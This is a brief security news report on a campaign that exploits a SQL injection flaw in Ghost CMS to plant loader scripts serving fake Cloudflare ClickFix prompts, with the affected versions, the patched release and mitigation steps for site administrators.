A large-scale campaign is exploiting a critical SQL injection vulnerability in Ghost CMS to inject malicious JavaScript code that triggers ClickFix attack flows. The campaign was discovered by XLab threat intelligence researchers, who confirmed impact on more than 700 domains, including university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs, according to Bleeping Computer.The vulnerability, identified as CVE-2026-26980, affects Ghost versions 3.24.0 through 6.19.0, allowing unauthenticated attackers to steal admin API keys. These keys grant access to manage users, articles, and themes, enabling the injection of malicious JavaScript into website articles. This script acts as a loader, fetching further code from attacker infrastructure. Visitors who pass a fingerprinting verification are presented with a fake Cloudflare prompt, leading them to execute a command that installs malware, including DLL loaders, JavaScript droppers, and a malicious program called UtilifySetup.exe.While a fix was released in Ghost CMS version 6.19.1 on February 19, many sites have not yet updated. The attack chain involves exploiting the SQL injection to gain elevated privileges, injecting a cloaking script, and then serving a ClickFix lure to unsuspecting users. To mitigate the risk, administrators are urged to upgrade to version 6.19.1 or later, rotate all potentially compromised API keys, and conduct thorough website reviews to remove malicious scripts.Source: Bleeping Computer
Get daily email updates
SC Media's daily must-read of the most current and pressing daily news
You can skip this ad in 5 seconds